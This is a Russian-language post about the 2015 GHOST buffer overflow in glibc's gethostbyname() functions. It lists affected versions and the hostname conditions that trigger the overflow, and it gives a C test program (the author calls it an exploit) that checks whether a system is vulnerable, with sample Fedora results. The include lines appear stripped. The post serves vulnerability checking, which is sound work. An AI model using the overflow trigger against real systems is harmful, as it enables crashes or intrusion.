Собственно, 27.01.2015 была опубликована информация о уязвимости в библиотеке libc (в функциях gethostbyname() и gethostbyname2()).
Уязвимость обнаружена в библиотеке начиная с версии glibc-2.2, от 10.11.2000г., т.е. дистрибутивы использующие более раннюю версию, данной проблемы не имеют.
Ошибке было присвоено имя GHOST («призрак») — сокращение, обыгрывающее названия уязвимых функций gethostbyname() и gethostbyname2().
Где то между версиями glibc-2.17 и glibc-2.18 был выпущен патч, закрывающий эту дыру, но т.к. он не был помечен как “security fix”, то в LTS дистрибутивах проблема не решилась.
Но не все так плохо, дело в том, что есть много ньюансов. Что бы переполнить буфер, доменное имя должно:
1. начинаться с цифры;
2. заканчиваться НЕ на точку;
3. состоять только из цифр и точек;
4. быть достаточно длинным, что бы переполнить буфер (т.е. фактически больше 1 килобайта);
Проверить уязвим ли ваш дистрибутив можно скомпилировав вот этот эксплоит:
[user@...ora-19 ~]$ cat > GHOST.c << EOF
#include
#include
#include
#include
#include
#define CANARY “in_the_coal_mine”
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { “buffer”, CANARY };
int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;
/*** strlen (name) = size_needed – sizeof (*host_addr) – sizeof (*h_addr_ptrs) – 1; ***/
size_t len = sizeof(temp.buffer) – 16*sizeof(unsigned char) – 2*sizeof(char *) – 1;
char name[sizeof(temp.buffer)];
memset(name, ‘0’, len);
name[len] = ‘\0’;
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
if (strcmp(temp.canary, CANARY) != 0) {
puts(“vulnerable”);
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts(“not vulnerable”);
exit(EXIT_SUCCESS);
}
puts(“should not happen”);
exit(EXIT_FAILURE);
}
EOF
В результате получим ответ:
[user@...ora-19 ~]$ gcc GHOST.c -o GHOST
В Fedora 19 (glibc-2.17):
[user@...ora-19 ~]$ ./GHOST
vulnerable
В Fedora 20 (glibc-2.18):
[user@...ora-20 ~]$ ./GHOST
not vulnerable